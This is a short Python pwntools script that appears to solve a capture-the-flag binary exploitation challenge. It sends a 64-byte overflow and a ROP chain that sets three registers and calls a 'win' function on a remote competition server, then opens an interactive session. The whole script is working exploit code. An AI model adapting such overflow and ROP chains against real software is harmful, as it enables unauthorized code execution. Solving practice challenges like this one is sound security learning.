from pwn import *

OFFSET = 64
context.binary = elf = ELF("./toolkit", checksec=False)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13554)

var1 = 0x1111111111111111
var2 = 0x2222222222222222
var3 = 0x3333333333333333

pop_rdi = 0x00000000004011FF
pop_rdx = 0x0000000000401211
pop_rsi = 0x0000000000401208
ret = 0x000000000040101A
win = 0x000000000040121E
print(p.recvuntil(b"[toolkit] Input: "))
payload = flat(
    b"A" * OFFSET,
    p64(ret),
    p64(pop_rdi),
    p64(var1),
    p64(pop_rsi),
    p64(var2),
    p64(pop_rdx),
    p64(var3),
    p64(win),
)
p.send(payload)
p.send(b"\n")
p.interactive()